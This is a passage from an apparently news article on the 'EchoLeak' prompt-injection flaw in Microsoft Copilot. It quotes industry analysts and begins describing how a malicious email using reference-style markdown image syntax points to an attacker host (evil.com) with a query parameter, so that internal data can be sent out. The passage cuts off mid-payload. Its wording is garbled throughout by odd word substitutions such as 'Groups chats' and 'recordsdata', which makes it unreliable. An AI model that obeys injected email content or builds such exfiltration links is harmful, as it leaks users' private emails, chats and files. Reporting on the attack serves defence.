“That is sheer weaponization of AI’s core power, contextual understanding, towards itself,” stated Abhishek Anant Garg, an analyst at QKS Group. “Enterprise safety struggles as a result of it’s constructed for malicious code, not language that appears innocent however acts like a weapon.”
This sort of vulnerability represents a big risk, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based providers, it’s undoubtedly not the final we’ll see.”
EchoLeak’s exploit mechanism
EchoLeak exploits Copilot’s skill to deal with each trusted inner knowledge (like emails, Groups chats, and OneDrive recordsdata) and untrusted exterior inputs, similar to inbound emails. The assault begins with a malicious e mail containing particular markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=
